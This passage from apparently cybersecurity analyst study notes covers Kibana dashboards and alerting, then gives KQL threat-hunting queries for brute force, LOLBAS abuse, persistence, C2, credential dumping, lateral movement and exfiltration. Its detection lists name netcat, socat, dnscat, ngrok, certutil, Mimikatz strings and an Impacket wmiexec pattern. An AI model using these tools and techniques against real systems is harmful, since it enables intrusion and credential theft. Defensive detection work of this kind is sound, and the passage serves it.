user can create multiple dashboards to fulfil a specific
need.
     Click on Add from Library.
     Click on the visualizations and saved searches. It
     will be added to the dashboard.
     Once the items are added, adjust them accordingly,
     as shown below.
     Don't forget to save the dashboard after completing
     it.
                   †1RWHV &DWDORJ H &\ EHU 6HFXULW\ 6 WXG\
        1RWHV &HUWLI LFDWLRQV &\ EHUVHFXULW\ +7% &’ 6 $ NLEDQD      J LI ‡
                                 517 / 547
                            HTB CDSA
                        FRXOG QRWEH I RXQG
Creating Canvas with Kibana
Canvas allows users to control the visual appearance of
their data a lot more granularly, making it ideal for use in
presenting key insights derived from data. Unlike normal
presentations though, Canvas can be powered by live
datasets on Elasticsearch in real time.
Follow these instructions to create your first Canvas
presentation:
   1. Navigate to Canvas using the navigation menu and
      click on Create Workpad.
   2. Click on Add element, click on Chart, and then
      Metric. Click on the newly created element on the
       workpad to display its properties in the window on
       the right-hand side.
   3. Click on the Data tab for the selected element and
      click on Demo data to change the data source.
                            518 / 547
                           HTB CDSA
   4. Canvas supports a range of data sources.
      Elasticsearch SQL (SQL-like syntax) can be used to
       pull aggregated datasets while raw documents can
       be filtered and retrieved using the Elasticsearch
       documents option.
Creating Maps with Kibana
Elasticsearch comes with great support for geospatial data
out of the box.
Geo-point fields can hold a single geographic location
(latitude/longitude pair) while Geo-shape fields support
the encoding of arbitrary geoshapes (such as lines,
squares, polygons, and so on).
Geospatial data is useful (and rather common) in several
                            519 / 547
                           HTB CDSA
use cases. For example, logs containing public addresses
will often contain (or can be enriched with) geo-location
information for the corresponding host.
Example of geo-queries that can be used while working on
elastic search:
     geo_distance: finds docs containing a geo-point
     within a given distance from a specified
     geo_point .
     geo_bounding_box: finds docs with    geo-points
     falling inside a specified geographical boundary.
Follow these instructions to create your first map on
Kibana:
     Open the Maps app using the navigation menu and
     click on Create map. The default map includes a Road
     map base layer. Your blank map should look as
     follows:
                           520 / 547
                           HTB CDSA
     Maps can contain multiple layers, visualizing
     different bits of information. Click on the Add layer
     button to see the different types of layers you can
     add. Select the Documents layer type to visualize a
     geospatial field contained in Elasticsearch
     documents.
     Depending on which dataset you are working with,
     Choose the dataset     view as the data source and
      the desired field      as the geospatial field. Click
     on Add layer to continue.
     You can now edit the layer properties to define the
     behavior of the layer such as controlling and setting
     the name of the fields, adding tooltips, adding
     filters,etc.
Creating Alerts in Kibana
Kibana alerting is an integrated platform feature across all
solutions in Kibana. Security analysts, for example, can
use alerting to apply threat detection logic and the
appropriate response workflows to mitigate potential
issues. Engineering teams may use alerts to find
precursors to a potential outage and alert the on-call site
reliability engineer to take necessary action.
How Alerts Work in Kibana
Alerts in Kibana are defined by a rule. A rule determines
the logic behind an alert (condition), the interval at which
the condition should be checked (schedule), and the
response actions to be executed if the detection logic
returns any resulting data.
                            521 / 547
                           HTB CDSA
Creating Rules
Kibana supports different rules types which can be
inspected at the below link:
 https://www.elastic.co/guide/en/kibana/8.0/rul
 e-types.html
Rules can be created by navigating into     Stack
Management from the navigation         menu and clicking on
Rules and Connectors .
The above rules is set to check and run an elastic search
query every 5 minutes and sends a notification/alert when
the query returns more than a set number of results.
The query that will run varies depending on what you want
to monitor but to lay down an example, lets say you are
                           522 / 547
                           HTB CDSA
monitoring DNS requests and want to alert whenever an
endpoint attempts to query an external DNS server as this
may indicate malicious activity.
You could create a new rule with below KQL query:
 event.category:(network or network_traffic)
 and (event.type:connection or type:dns) and
 (destination.port:53 or
 event.dataset:zeek.dns) and source.ip:(
 10.0.0.0/8 or
 ... ) and not destination.ip:( 10.0.0.0/8 or
 ...)
Then select the index patterns. In this case indexes
should be   packetbeat   and    auditd
Don't forget to change values according to your
environment.
*Creating an alert to detect SSH brute force**
A singular failed SSH authentication attempt is not
necessarily indicative of undesired or malicious activity.
However, 100 failed attempts within the span of 5 minutes
can indicate potential brute force activity and may be of
interest to a security analyst.
To achieve this, we would need to create a threshold
                            523 / 547
                           HTB CDSA
rule. Your rule may look similar to the one below:
To test your rule, attempt to SSH into your Linux
web server with an incorrect username. Repeat the failed
attempt 20 times to simulate the detection and wait for
the detection to appear on the Alerts tab.
Cyber Cases Studies
When using Elastic Stack in cyber security, we usually
have a dataset that, in most cyber security cases,
represent logs and events. The source of these logs can
be from Windows machine, Linux machines, public web
servers, etc.
Its important to correctly import these logs to Kibana in
order to use the KQL to retrieve data and insights that can
be used in incident response and threat hunting.
Hunting SSH Brute Force Attempts
                            524 / 547
                            HTB CDSA
Brute-forcing attacks are focused on authentication
events, which generate several failed attempts before
successfully retrieving a valid credential.
Lets say we have imported logs from a Linux machine and
stored then under an index in Kibana named        Linux-logs
then by specifying this index as the source, we can
execute below query to retrieve failed login attempts
 event.category: authentication AND
 system.auth.ssh.event: Failed
If we find high number of counts toward specific IP
addresses such as     10.10.1.10        we can then narrow
down the search to see if they got successful logins after
the failed attempts
 event.category: authentication AND
 system.auth.ssh.event: Accepted AND source.ip:
 10.10.1.10
If we find logs satisfying the above query, it means that
the owner of the IP   10.10.1.10        has successfully
breached and logged in to the SSH server.
Hunting For Brute Force on Windows
If the target machine is Windows then we can rely on Win
event IDs to spot such attempts.
Using the below query, we can hunt for failed
authentication attempts. It would be good if you create a
visualize table for this query and spot the username with
highest counts of this event.
                            525 / 547
                            HTB CDSA
 winlog.event_id: 4625
Then after spotting the username, we can hunt for failed
authentication attempts generated by the user
malicious
 winlog.event_id: 4625 AND user.name: malicious
To confirm if the user has successfully authenticated after
a potential brute-forcing attempt, we can replace the KQL
query with Event ID 4624
 winlog.event_id: 4624 AND user.name: malicious
To expand our investigation, we can then check the
processes spawned by this user inside the workstation
they got access to.
 host.name: host-1 AND winlog.event_id: 1 AND
 user.name: malicious
Hunting Directory Enumeration Attempts
Directory enumeration is the process of using automated
tools such as   gobuster   and     dirbuster   to list all
hidden and non-hidden directories on a web server. The
purpose is to have a complete map of the website
directories in order to conduct further attacks.
However, directory enumeration usually results in many
404   response from the webserver for the webpages that
don't exist so if we hunt for these responses first and
find narrow down to which IP addresses have the highest
                            526 / 547
                           HTB CDSA
counts of such events, we can then have an initial IPs
suspected of conducting directory enumeration.
 network.protocol: http AND destination.port:
 80 AND http.response.status_code: 404
If we found IP addresses with high counts for the above
query, we can then use these IP addresses to find the
URLs they have enumerated and received 404 from the
webserver
 network.protocol: http AND destination.port:
 80 AND source.ip: 10.10.1.10 AND
 http.response.status_code: 404
If we want to see what were the directories that have
been successfully discovered by the attacker then we can
change the query to
 network.protocol: http AND destination.port:
 80 AND source.ip: 10.10.1.10 AND
 http.response.status_code: (200 OR 301 OR 302)
Investigating Phishing Attacks
By using the following KQL query, we will hunt file
creations (Sysmon Event ID 11) generated by chrome.exe.
This can indicate successful downloads of email
attachments.
 process.name: chrome.exe AND winlog.event_id:
 11
                           527 / 547
                            HTB CDSA
Alternatively, we can hunt phishing attachments opened
using an Outlook client
 process.name: OUTLOOK.EXE AND winlog.event_id:
 11
Hunting Command Execution
Command execution usually happens when the attacker has
already compromised the machine and wants to download
further payloads
Command execution can be spotted by looking for the
below events:
     Suspicious usage of command-line tools
     through    powershell.exe          and   cmd.exe   to
     download and execute the staged payload
     Abuse of built-in system tools such as
      certutil.exe    or   bitsadmin.exe          for
     downloading the remote payload
     and   rundll32.exe    to run it
     Execution via programming/scripting tools such as
     Python's    os.system()        or PHP's    exec() .
By using the following KQL query, we will hunt process
creations (Sysmon Event ID 1) generated by
powershell.exe and cmd.exe
 winlog.event_id: 1 AND process.name: (cmd.exe
 OR powershell.exe)
An alternative way to hunt unusual PowerShell execution is
through the events generated by PowerShell's Script Block
                            528 / 547
                           HTB CDSA
Logging. We can use the following KQL syntax to list all
events generated by it:
  winlog.event_id: 4104
After retrieving the results, ensure that        "Set-
 StrictMode" is removed from            the results by clicking on
the - beside it in the filters.
Aside from manually reviewing the events generated
by PowerShell or Windows Command Prompt, known
strings used in cmd.exe or powershell.exe can also be
leveraged to determine unusual traffic.
Some examples of PowerShell strings are provided below:
 -   invoke / invoke-expression / iex
 -   -enc / -encoded
 -   -noprofile / -nop
 -   bypass
 -   -c / -command
 -   -executionpolicy / -ep
 -   WebRequest
 -   Download
                            529 / 547
                           HTB CDSA
Hunting Command Execution Through Living Off The Land
Binaries
Aside from PowerShell and Command Prompt binaries,
other built-in binaries are also abused by threat actors to
execute malicious commands. Most of these binaries,
known as Living Off The Land Binaries (LOLBAS), are
documented on this page. Using this resource, we can
hunt usage of built-in binaries (Certutil, Mshta, and
Regsvr32) and investigate unusual commands executed and
network connections initiated.
By using the following KQL query, we can hunt process
creation (Sysmon Event ID 1) as well as network
connection (Sysmon Event ID 3) events:
 winlog.event_id: (1 OR 3) AND (process.name:
 (mshta.exe OR certutil.exe OR regsvr32.exe) OR
 process.parent.name: (mshta.exe OR
 certutil.exe OR regsvr32.exe))
Hunting Command Execution Through Programming
Languages
Scripting and programming tools are typically found in
either workstations owned by software developers or
servers requiring these packages to run applications.
These tools are benign, but threat actors abuse their
functionalities to execute malicious code.
Given this, we will hunt for unusual events generated by
programming tools like Python, PHP and NodeJS.
We can use the following KQL query to hunt process
creation (Sysmon Event ID 1) and network connection
(Sysmon Event ID 3) events:
                            530 / 547
                             HTB CDSA
 winlog.event_id: (1 OR 3) AND (process.name:
 (*python* OR *php* OR *nodejs*) OR
 process.parent.name: (*python* OR *php* OR
 *nodejs*))
Hunting Defense Evasion Tactics: Disabling Windows
Defender
By using the following KQL query, we will hunt events
indicating an attempt to disable the running host antivirus:
 (*DisableRealtimeMonitoring* OR
 *RemoveDefinitions*)
     DisableRealtimeMonitoring - Commonly used with
     PowerShell's   Set-MPPreference     to disable its
     real-time monitoring.
     RemoveDefinitions - Commonly used with built-
     in   MpCmdRun.exe   to remove all existing signatures
     of Windows Defender.
     Hunting Defense Evasion Tactics: Deleting Logs
     The simplest way to detect the deletion of Windows
     Event Logs is via Event ID 1102. These events are
     always generated when a user attempts to delete
     Windows Logs.
 winlog.event_id: 1102
Hunting Defense Evasion Tactics: Process Injection
To uncover process injection attempts, we can focus on
Sysmon's Event ID 8 (CreateRemoteThread), which
                             531 / 547
                           HTB CDSA
detects when a process creates a thread in another
process.
 winlog.event_id: 8
Hunting For Persistence: Scheduled Tasks
Scheduled tasks are commonly used to automate
commands and scripts to execute based on schedules or
triggers.
If Windows Advanced Audit Policy is properly configured,
we can use Event ID 4698 (Scheduled Task Creation).
Else, we can use the following keywords for hunting
commands related to scheduled tasks in Kibana
 (winlog.event_id: 4698 OR (*schtasks* OR
 *Register-ScheduledTask*))
Hunting For Persistence: Registry Key Changes
To detect persistence through Registry, we can focus on
the below registry keys:
     Software\Microsoft\Windows\CurrentVersion\Explorer
     \Shell (User Shell Folders)
     Software\Microsoft\Windows\CurrentVersion\Run
     (RunOnce)
 winlog.event_id: 13 AND winlog.channel:
 Microsoft-Windows-Sysmon/Operational AND
 registry.path: (*CurrentVersion\\Run* OR
 *CurrentVersion\\Explorer\\User* OR
 *CurrentVersion\\Explorer\\Shell*)
                           532 / 547
                           HTB CDSA
Additionally, we can extract changes made to the registry
by specifying the process name. The query below is to
look for registry modifications committed by   reg.exe   or
powershell.exe
 host.name: WKSTN-* AND winlog.event_id: 13 AND
 winlog.channel: Microsoft-Windows-
 Sysmon/Operational AND process.name: (reg.exe
 OR powershell.exe)
Hunting for Command & Control Communications: C2 over
DNS
C2 over DNS, or more accurately Command and Control
over DNS, is a technique used by adversaries
where DNS protocols are utilised to establish a Command
and Control channel. In this technique, adversaries can
disguise their C2 communications as typical DNS queries
and responses, bypassing network security measures.
We can focus on patterns such as:
     High count of unique subdomains
     Unusual DNS requests based on query types (MX,
     CNAME, TXT).
We can list all DNS queries and exclude all
reverse DNS lookups
 network.protocol: dns AND NOT
 dns.question.name: *arpa
Hunting for Command & Control Communications: C2 Over
HTTPS
                           533 / 547
                            HTB CDSA
The main notable thing about this technique is that
attackers use their own C2 domain, including custom
traffic encryption over HTTP with below common patterns:
      High count of HTTP traffic to distinctive domains
      High outbound HTTP bandwidth to unique domains
We can first hunt for outbound or egress HTTP requests
 network.protocol: http AND network.direction:
 egress
Based on the output, you will see a list of domains that
have been contacted over HTTP along with their counts.
You can then pick the domain with the highest counts and
investigate further:
 network.protocol: http AND network.direction:
 egress AND destination.domain: malicious.xyz
Then you will be able to identify all HTTP requests made to
this malicious domains including any potential shells or
php   files requested in GET requests.
Hunting Enumeration & Discovery Attempts
Enumeration involves identifying system and network
configurations, finding sensitive data, or identifying other
potential targets within the network.
To hunt such attempts, we may focus on discovering:
      Host reconnaissance activity
      Internal network scanning
      Active directory execution
      And as such we can build the queries in elastic
                            534 / 547
                           HTB CDSA
     search to discover the use of the below tools:
     whoami.exe
     hostname.exe
     net.exe
     systeminfo.exe
     ipconfig.exe
     netstat.exe
     tasklist.exe
Example query below will hunt process creations
(Sysmon Event ID 1) generated by the above mentioned
tools:
 winlog.event_id: 1 AND process.name:
 (whoami.exe OR hostname.exe OR net.exe OR
 systeminfo.exe OR ipconfig.exe OR netstat.exe
 OR tasklist.exe)
Note that the use of the above tools is not necessarily
malicious as sys admins use them to conduct
troubleshooting on the machines they manage therefore it
will be always useful to grab the parent process ID that
spawned these tools and dig deeper.
Example query is shown below:
 winlog.event_id: 1 AND process.pid: 7786
If you discover a strange parent process to the above
process7786    such as the use of Powershell to spawn
cmd.exe you    can then assume it might be malicious.
Hunt for Unusual Network Scanning
Internal network connections are always presumed to be
                           535 / 547
                           HTB CDSA
benign due to the assumption that they originate from
legitimate host services and user activity. However,
threat actors tend to blend from this noise while
enumerating reachable assets for potential pivot points.
One example is scanning open ports on a reachable device,
which generates several connections to unique destination
ports.
Depending on your internal network subnet IPs, you may
use the below query to hunt internal connections on known
ports:
 source.ip: 10.0.0.0/8 AND destination.ip:
 10.0.0.0/8 AND destination.port < 1024
If you found a high count towards the destination IP
subnet such as more than 800 counts then this means that
the specified destination IP is being scanned.
Your next step would be investigating what process is
responsible for these scan attempts.
Let's assume that endpoint with destination IP
192.168.1.15 received the highest count     of probes from
192.168.1.10 , based on this assumption     we can build a
query to list all network connection events satisfying the
above criteria to find and uncover the responsible
process:
 winlog.event_id: 3 AND source.ip: 192.168.1.10
 AND destination.ip: 192.168.1.15 AND
 destination.port < 1024
Hunting Active Directory Enumeration
Domain Enumeration typically generates many LDAP
                           536 / 547
                            HTB CDSA
queries. However, it is also typical for an internal
network running an Active Directory to create this
activity. Given this, threat actors tend to blend in the
regular traffic to mask their suspicious activity of
harvesting active directory objects to tailor their potential
internal attack vectors.
Based on this, we may focus on unusual LDAP
connections. For example, we can build a query that
focuses on hunting processes that initiated an LDAP
network connection (port 389 for LDAP and port 636 for
LDAP over SSL).
 winlog.event_id: 3 AND source.ip: 10.0.0.0/8
 AND destination.ip: 10.0.0.0/8 AND
 destination.port: (389 OR 636) AND NOT
 process.name: mmc.exe
We have excluded    mmc.exe      from the query since this
process typically generates benign LDAP connections.
Hunting Privilege Escalation
Some of the methods we can follow to detect privilege
escalation is to look for signs of the below activities:
     Elevating access
     through SeImpersonatePrivilege abuse.
     Abusing excessive service permissions.
Additionally, successful privilege escalation attempts
always indicate activities generated by a privileged
account. In the context of abusing machine vulnerabilities,
the user access is typically elevated to the NT
Authority\System account on Windows endpoints. Given
this, we can attempt to hunt for processes executed by
                             537 / 547
                           HTB CDSA
low-privileged accounts that led to a SYSTEM account
access. In other words, we can hunt for processes
spawned by the SYSTEM account accompanied by a parent
process executed by a low-privileged account.
 winlog.event_id: 1 AND user.name: SYSTEM AND
 NOT winlog.event_data.ParentUser: "NT
 AUTHORITY\SYSTEM"
We have excluded events with a value of NT
AUTHORITY\SYSTEM on its ParentUser field since these
events do not indicate privilege escalation.
In the example below, we see an entry for a web server
account spawning a process leading to SYSTEM user.
To investigate further, we can use the executable name
spoofer.exe    and investigate process creating events to
find out the parent process that spawned it and examine
whether its malicious.
 winlog.event_id: 1 AND process.name:
 spoofer.exe
Aside from abusing account privileges, threat actors also
hunt for excessive permissions assigned to their current
account access. One example is excessive service
permissions allowing low-privileged users to modify and
restart services running on a privileged account context.
                            538 / 547
                            HTB CDSA
Given this, we can hunt for events abusing this behaviour
using Sysmon Event ID: 13 (Registry Value Set).
The KQL query below is focused on hunting registry
modifications on the services' ImagePath registry key,
which is the field that handles what binary will be
executed by the service.
 winlog.event_id: 13 AND registry.path:
 *HKLM\\System\\CurrentControlSet\\Services\\*\
 \ImagePath*
Below we can see that executable        update.exe was   set
in the registry path of the service     SNMPTRAP which
means that this service, when it starts, will load up
update.exe    so if that executable is malicious then we
can confirm privilege escalation through service abuse.
If we want to confirm the execution of     update.exe
through the service, we can look for events satisfying the
below query:
 winlog.event_id: 1 AND process.parent.name:
 services.exe AND process.name: update.exe
Hunting Credential Harvesting
After gaining privileged access to a compromised host,
threat actors always tend to harvest more credentials and
use them to move laterally. One of the most prominent
examples is dumping LSASS credentials via Mimikatz.
                            539 / 547
                           HTB CDSA
Another way is simply creating a dump file of the
lsass.exe process, which contains in-memory credentials.
One of the best ways to start is to look for events
indicating the use of Mimikatz to dump credentials:
 winlog.event_id: 1 AND process.command_line:
 (*mimikatz* OR *DumpCreds* OR
 *privilege\:\:debug* OR *sekurlsa\:\:*)
As an alternative technique for Mimikatz, threat actors
can use the Task Manager and create a process dump of
lsass.exe. However, this technique also leaves traces,
which security analysts can leverage to detect this
technique. By default, dump files generated by the Task
Manager are written
to C:\Users\*\AppData\Local\Temp\ directory           and
named using the format processname.DMP .
So we can hunt for file creation events around
lsass.DMP
 winlog.event_id: 11 AND file.path: *lsass.DMP
Moreoever, DCSync attacks can be used to dump and
harvest credentials. DCSync abuses how domain
controllers in an Active Directory network communicate
and replicate data. Normally, domain controllers
synchronise directory information, including password
hashes, via the Directory Replication Service Remote
protocol (MS-DRSR).
For reference, the replication request to a domain
controller requires the following privileges:
                           540 / 547
                           HTB CDSA
 - DS-Replication-Get-Changes (1131f6aa-9c07-
 11d1-f79f-00c04fc2dcd2)
 - DS-Replication-Get-Changes-All (1131f6ad-
 9c07-11d1-f79f-00c04fc2dcd2)
 - Replicating Directory Changes All (9923a32a-
 3607-11d2-b9be-0000f87a36b2)
 - Replicating Directory Changes In Filtered
 Set (89e95b76-444d-4c62-991a-0facbeda640c)
Note: Only Domain/Enterprise Admins and domain
controller machine accounts have these privileges by
default.
In the below query, we use the event ID 4662 to hunt for
events related to Directory Service object access since we
want to trace when a user attempts to access an Active
Directory Domain Services (AD DS) object. Moreover, we
have translated the privileges into their corresponding GUID
value and used it on
the   winlog.event_data.Properties       field. Lastly, we
have also added the AccessMask value of 0x100 (Control
Access). This value signifies that the user has enough
privileges to conduct the replication.
 winlog.event_id: 4662 AND
 winlog.event_data.AccessMask: 0x100 AND
 winlog.event_data.Properties: (*1131f6aa-9c07-
 11d1-f79f-00c04fc2dcd2* OR *1131f6ad-9c07-
 11d1-f79f-00c04fc2dcd2* OR *9923a32a-3607-
                            541 / 547
                           HTB CDSA
 11d2-b9be-0000f87a36b2* OR *89e95b76-444d-
 4c62-991a-0facbeda640c*)
As can be seen below, that the account   backadm    has
executed domain replication actions such as syncing and
changing. This is suspicious because such actions are only
done by privileged accounts and shouldn't be seen on
other accounts. This raises the suspicious that this
account might have been compromised and used in DCSync
attack to dump credentials.
To investigate this account further, we can hunt for
process creation events coming from this account:
 winlog.event_id: 1 AND user.name: backupadm
Hunting Lateral Movement
The hunt for Lateral Movement involves uncovering
suspicious authentication events and remote machine
access from a haystack of benign login attempts by
regular users. On a typical working day in an internal
network, events generating remote access to different
hosts and services are expected. May it be access to a
file share, remote access troubleshooting, or network-
wide deployment of patches.
We can follow two approaches to detect lateral movement
attempts:
     Lateral Movement via WMI.
                           542 / 547
                            HTB CDSA
      Authentication via Pass-the-Hash.
WMI is widely used for system administration, monitoring,
configuration management, and automation tasks in
Windows environments. However, threat actors also use
this functionality to execute commands remotely and
establish access to remote targets. One standard indicator
of WMI's usage is the execution of the WmiPrvSE.exe
process. In addition, this process will spawn a child
process if WMI is used to execute commands remotely.
 winlog.event_id: 1 AND process.parent.name:
 WmiPrvSE.exe
it can be seen that  WmiPrvSE.exe has spawned multiple
instances of   cmd.exe processes and the commands
executed through cmd.exe has an unusual pattern, which
seems that it is writing the executed commands' output
on   ADMIN$    C:\Windows\ directory.
               or
The pattern, cmd.exe /Q /c * \ 1>
 \\127.0.0.1\ADMIN$\* 2>&1 , is attributed      to
Impacket's wmiexec.py, a known tool for lateral
movement.
You can then investigate further and locate the initial IP of
the compromised host used to execute these commands by
                            543 / 547
                            HTB CDSA
highlighting the event and clicking on    view surrounding
documents    and filter for event ID    4624 which should
list all events leading up to the above event.
Threat actors also utilise account hashes if the plaintext
password does not exist from the dumped credentials as
an alternative way of authentication, and this technique is
called Pass-the-Hash (PtH). PtH is a technique threat
actors use to authenticate and gain unauthorised access
to systems without knowing the user password. It
exploits how authentication protocols, such as NTLM,
store and use password hashes instead of plaintext
passwords.
There are ways to detect the usage of PtH while
authenticating remotely. The list below details the
indicators of PtH on network authentication:
     Event ID: 4624
     Logon Type: 3 (Network)
     LogonProcessName: NtLmSsp
     KeyLength: 0
Based on the above, we can use the below query:
 winlog.event_id: 4624 AND
 winlog.event_data.LogonType: 3 AND
 winlog.event_data.LogonProcessName: *NtLmSsp*
 AND winlog.event_data.KeyLength: 0
Hunting Keylogger Activity
Most common forms of keyloggers are implemented with
direct API calls, registry modifiers, malicious driver files,
customized scripts and function calls, and packed
                            544 / 547
                          HTB CDSA
executables.
Keylogging with API and function calls and common calls
are listed below:
 -   GetKeyboardState
 -   SetWindowsHook
 -   GetKeyState
 -   GetAsynKeyState
 -   VirtualKey
 -   vKey
 -   filesCreated
 -   DrawText
Keylogging with low-level hooks common hooks are listed
below:
 -   SetWindowHookEx
 -   WH_KEYBOARD
 -   WH_KEYBOARD_LL
 -   WH_MOUSE_LL
 -   WH_GETMESSAGE
Setting the right index in ELK, we can use the below query
to match the above patterns:
 *GetKeyboardState* or *SetWindowsHook* or
 *GetKeyState* or *GetAsynKeyState* or
 *VirtualKey* or *vKey* or *filesCreated* or
 *DrawText*
                           545 / 547
                            HTB CDSA
Hunting Data Exfiltration
Data exfiltration attempts can be detected by focusing on
the detection of common system and processes used
instead of investigating network traffic.
Common command execution and file access activities
associated with data exfiltration are listed below;
 - ping, ipconfig, arp, route, telnet
 - tracert, nslookup, netstat, netsh
 - localhost, host, smb, smtp,scp, ssh,
 - wget, curl, certutil, net use,
 - nc, ncat, netcut, socat, dnscat, ngrok
 - psfile, psping
 - tcpvcon, tftp, socks,
 - Invoke-WebRequest, server, http, post, ssl,
 encod, chunk, ssl
We can look for a system tool call that leads to data
transfer in the query:
 *$ping* or *$ipconfig* or *$arp* or *$route*
 or *$telnet* or *$tracert* or *$nslookup* or
 *$netstat* or *$netsh* or *$smb* or *$smtp* or
 *$scp* or *$ssh* or *$wget* or *$curl* or
 *$certutil* or *$nc* or *$ncat* or *$netcut*
 or *$socat* or *$dnscat* or *$ngrok* or
 *$psfile* or *$psping* or *$tcpvcon* or
 *$tftp* or *$socks* or *$Invoke-WebRequest* or
 *$server* or *$post* or *$ssl* or *$encod* or
 *$chunk* or *$ssl*
                            546 / 547
                          HTB CDSA
Done !
Check out other cheat sheets and study notes using the
below link
 https://shop.motasem-notes.net
 https://buymeacoffee.com/notescatalog
                          547 / 547